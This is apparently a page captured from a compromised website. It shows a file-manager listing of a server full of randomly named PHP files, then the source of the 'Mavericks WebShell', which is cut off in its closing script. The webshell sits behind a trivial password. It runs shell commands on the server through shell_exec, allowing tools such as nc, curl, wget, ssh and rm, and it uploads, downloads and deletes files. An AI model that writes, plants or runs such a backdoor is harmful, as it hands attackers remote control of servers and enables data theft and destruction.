Gecko [ 36julay.space ]

Name	Size	Permission	Date
.well-known	[ DIR ]	dr-xr-xr-x	2025-08-31 20:43
adi	[ DIR ]	drwxr-xr-x	2025-09-06 08:22
admin	[ DIR ]	dr-xr-xr-x	2025-09-01 07:25
api_key	[ DIR ]	dr-xr-xr-x	2025-09-01 07:25
assets	[ DIR ]	dr-xr-xr-x	2025-09-01 07:25
cgi-bin	[ DIR ]	dr-xr-xr-x	2025-09-01 07:25
folderadmin	[ DIR ]	dr-xr-xr-x	2025-09-01 07:25
folderanimenew	[ DIR ]	dr-xr-xr-x	2025-09-01 07:25
font	[ DIR ]	dr-xr-xr-x	2025-09-01 07:25
fonts	[ DIR ]	dr-xr-xr-x	2025-09-01 07:25
footer	[ DIR ]	drwxr-xr-x	2025-09-06 06:17
heroadmin	[ DIR ]	dr-xr-xr-x	2025-09-01 07:25
includes	[ DIR ]	dr-xr-xr-x	2025-09-01 07:25
keyadmin	[ DIR ]	dr-xr-xr-x	2025-09-01 07:25
nibondon	[ DIR ]	dr-xr-xr-x	2025-09-01 07:25
order	[ DIR ]	dr-xr-xr-x	2025-09-01 07:25
pages	[ DIR ]	dr-xr-xr-x	2025-09-01 07:25
pdf	[ DIR ]	dr-xr-xr-x	2025-09-01 07:25
photo	[ DIR ]	dr-xr-xr-x	2025-09-01 07:25
photo_smart	[ DIR ]	dr-xr-xr-x	2025-09-01 07:25
pin	[ DIR ]	dr-xr-xr-x	2025-09-01 07:25
qr_photo	[ DIR ]	dr-xr-xr-x	2025-09-01 07:25
roaring	[ DIR ]	dr-xr-xr-x	2025-09-01 07:25
test	[ DIR ]	dr-xr-xr-x	2025-09-01 07:25
themesth	[ DIR ]	dr-xr-xr-x	2025-09-01 07:25
wp-admin	[ DIR ]	dr-xr-xr-x	2025-09-01 07:25
wp-coach	[ DIR ]	drwxr-xr-x	2025-09-06 08:30
wp-content	[ DIR ]	dr-xr-xr-x	2025-09-01 07:25
wp-includes	[ DIR ]	dr-xr-xr-x	2025-09-01 07:26
.htaccess	22.69 KB	-rw-r--r--	2025-09-06 10:26
amrlwbfc.php	53.21 KB	-rw-r--r--	2025-09-02 11:40
billmao.php	216.63 KB	-rw-r--r--	2025-09-04 18:19
db.php	61 B	-rw-r--r--	2025-09-06 02:44
error_log	12.29 KB	-rw-r--r--	2025-09-06 09:04
functions-helper.php	10.7 KB	-rw-r--r--	2025-09-06 04:00
goods.php	583 B	-rw-r--r--	2025-09-03 22:50
index.php	631 B	-rw-r--r--	2025-09-06 09:04
j250815_13.zip	3.58 KB	-rw-r--r--	2025-09-06 02:44
j250816_13.zip	3.58 KB	-rw-r--r--	2025-09-06 02:44
k.php	72 B	-rw-r--r--	2025-09-04 23:58
mnkalo.php	168.78 KB	-rw-r--r--	2025-09-04 18:24
nxpnlnfk.php	11.8 KB	-rw-r--r--	2025-09-02 11:28
ok.txt	4 B	-rw-r--r--	2025-07-27 00:22
php.ini	105 B	-rw-r--r--	2025-09-02 11:40
puffboat.php	3.78 KB	-rw-r--r--	2025-09-04 10:26
puskbguq.php	11.8 KB	-rw-r--r--	2025-09-02 11:40
robots.txt	3.02 KB	-rw-r--r--	2025-09-05 03:00
sirx.php	136.81 KB	-rw-r--r--	2025-09-04 18:07
t6wer-send.php	453 B	-rw-r--r--	2025-09-05 18:07
x-cp-KHoU3LOW.php	448 B	-rw-r--r--	2025-09-05 11:04
x-cp-cDequjHb.php	448 B	-rw-r--r--	2025-09-05 13:26
z.php	8.49 KB	-rw-r--r--	2025-07-31 02:22
zb.php	23.37 KB	-rw-r--r--	2025-09-02 12:24
zt2.php	52.07 KB	-rw-r--r--	2025-09-04 08:48

Rename

<?php
session_start();
date_default_timezone_set('UTC');
define('AUTH_PASSWORD', '106'); // change le mot de passe

// Vérification d'authentification
if (!isset($_SESSION['auth'])) {
    if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['password'])) {
        if ($_POST['password'] === AUTH_PASSWORD) {
            $_SESSION['auth'] = true;
            header('Location: '.$_SERVER['PHP_SELF']);
            exit;
        } else {
            $error = "Mot de passe incorrect.";
        }
    }
    echo '<!DOCTYPE html><html><head><title>Login - Mavericks</title>
    <style>
    body { background: black; color: #33ff33; font-family: monospace; display: flex; align-items: center; justify-content: center; height: 100vh; margin: 0; }
    form { background: #111; padding: 30px; border: 1px solid #33ff33; width: 300px; }
    input[type=password], input[type=submit] {
        background: black; color: #33ff33; border: 1px solid #33ff33;
        padding: 10px; width: 100%; margin-top: 10px;
    }
    </style></head><body>
    <form method="POST">
        <h2> Mavericks Webshell</h2>
        <input type="password" name="password" placeholder="Mot de passe" required>
        <input type="submit" value="Entrer">
        '.(isset($error) ? "<p style=\"color:red;\">$error</p>" : "").'
    </form></body></html>';
    exit;
}

// Liste blanche de commandes
$allowed_cmds = ['ls','id','pwd','whoami','cat','echo','df','top','ps','uptime','netstat','ifconfig','ip','who','last','chmod','chown','ping','curl','wget','find','grep','tar','zip','unzip','rmdir','rm','mkdir','cp','mv','uname','nc','telnet','ssh','history','lsblk','mount','umount','iptables','fuser','basename'];

function is_valid_command($cmd) {
    global $allowed_cmds;
    $parts = explode(" ", trim($cmd));
    $base_cmd = strtok($parts[0], ';|&'); // Empêche les commandes multiples
    return in_array($base_cmd, $allowed_cmds);
}

if (!isset($_SESSION['history'])) {
    $_SESSION['history'] = [];
}

$output = "";
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['cmd'])) {
    $cmd = trim($_POST['cmd']);
    if (is_valid_command($cmd)) {
        $exec = shell_exec(escapeshellcmd($cmd) . " 2>&1");
        $output = htmlspecialchars($exec ?: "Aucune sortie.");
        array_push($_SESSION['history'], ['time' => date("H:i:s"), 'cmd' => htmlspecialchars($cmd), 'output' => $output]);
        // Limiter l'historique à 50 entrées
        if (count($_SESSION['history']) > 50) {
            array_shift($_SESSION['history']);
        }
    } else {
        $output = "Commande non autorisée.";
    }
}

// Téléchargement
if (isset($_GET['download'])) {
    $file = basename($_GET['download']);
    if (file_exists($file) && is_file($file)) {
        header('Content-Description: File Transfer');
        header('Content-Type: application/octet-stream');
        header('Content-Disposition: attachment; filename="'.basename($file).'"');
        header('Content-Length: ' . filesize($file));
        readfile($file);
        exit;
    } else {
        echo "Fichier introuvable."; exit;
    }
}

// Suppression de fichier
if (isset($_POST['delete_file']) && !empty($_POST['delete_file'])) {
    $file = basename($_POST['delete_file']);
    if (file_exists($file) && is_writable($file)) {
        if (unlink($file)) {
            $output = "Fichier '$file' supprimé.";
        } else {
            $output = "Erreur lors de la suppression du fichier '$file'.";
        }
    } else {
        $output = "Fichier '$file' non trouvé ou non accessible.";
    }
}

// Upload de fichier
if (isset($_FILES['upload_file']) && $_FILES['upload_file']['error'] === UPLOAD_ERR_OK) {
    $target = basename($_FILES['upload_file']['name']);
    if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $target)) {
        $output = "Fichier uploadé : $target";
    } else {
        $output = "Upload échoué. Vérifiez les permissions.";
    }
}
?>
<!DOCTYPE html>
<html lang="fr">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Mavericks WebShell</title>
<style>
body {
    background: black;
    color: #33ff33;
    font-family: monospace;
    padding: 20px;
    margin: 0;
}
h1 { text-shadow: 0 0 5px #33ff33; }
input, button {
    background: black;
    color: #33ff33;
    border: 1px solid #33ff33;
    padding: 8px;
    margin: 5px;
}
pre {
    background: #111;
    border: 1px solid #33ff33;
    padding: 10px;
    overflow-x: auto;
    white-space: pre-wrap;
}
.autocomplete-items {
    position: absolute;
    background-color: #111;
    border: 1px solid #33ff33;
    z-index: 99;
    max-height: 200px;
    overflow-y: auto;
}
.autocomplete-items div {
    padding: 10px;
    cursor: pointer;
    color: #33ff33;
}
.autocomplete-active {
    background-color: #33ff33;
    color: black;
}
ul {
    list-style-type: none;
    padding: 0;
}
li {
    padding: 5px 0;
}
</style>
</head>
<body>
<h1>Mavericks WebShell</h1>

<form method="POST" autocomplete="off">
    <input type="text" name="cmd" id="cmdInput" placeholder="Commande shell..." required>
    <input type="submit" value="Exécuter">
</form>

<form method="POST" enctype="multipart/form-data">
    <input type="file" name="upload_file">
    <input type="submit" value="Uploader">
</form>

<form method="POST">
    <input type="text" name="delete_file" placeholder="Nom du fichier à supprimer">
    <input type="submit" value="Supprimer">
</form>

<?php if (!empty($output)): ?>
    <h3>Résultat :</h3>
    <pre><?= $output ?></pre>
<?php endif; ?>

<h3>📂 Fichiers locaux :</h3>
<ul>
<?php
foreach (scandir(".") as $f):
    if ($f === "." || $f === "..") continue;
    $filetype = is_dir($f) ? "📁" : "📄";
?>
    <li><?= $filetype ?> <?= htmlspecialchars($f) ?> —
        <?php if (!is_dir($f)): ?>
            <a href="?download=<?= urlencode($f) ?>">📥 Télécharger</a>
        <?php endif; ?>
    </li>
<?php endforeach; ?>
</ul>

<h3>🕘 Historique :</h3>
<?php foreach (array_reverse($_SESSION['history']) as $entry): ?>
    <div><strong>[<?= $entry['time'] ?>] $ <?= $entry['cmd'] ?></strong></div>
    <pre><?= $entry['output'] ?></pre>
<?php endforeach; ?>

<script>
const allowed = <?= json_encode($allowed_cmds) ?>;
const input = document.getElementById("cmdInput");
let currentFocus = -1;

input.addEventListener("input", function() {
    closeAllLists();
    if (!this.value) return false;
    const list = document.createElement("div");
    list.setAttribute("class", "autocomplete-items");
    this.parentNode.appendChild(list);
    allowed.forEach(cmd => {
        if (cmd.toLowerCase().startsWith(this.value.toLowerCase())) {
            const item = document.createElement("div");
            item.innerHTML = "<strong>" + cmd.substr(0, this.value.length) + "</strong>" + cmd.substr(this.value.length);
            item.innerHTML += "<input type='hidden' value='" + cmd + "'>";
            item.onclick = function() {
                input.value = this.getElementsByTagName("input")[0].value;
                closeAllLists();
            };
            list.appendChild(item);
        }
    });
});

input.addEventListener("keydown", function(e) {
    let items = document.querySelectorAll(".autocomplete-items div");
    if (e.key === "ArrowDown") { currentFocus++; setActive(items); }
    else if (e.key === "ArrowUp") { currentFocus--; setActive(items); }
    else if (e.key === "Enter" && currentFocus > -1) {
        e.preventDefault();
        if (currentFocus > -1 && items) items[currentFocus].click();
    }
});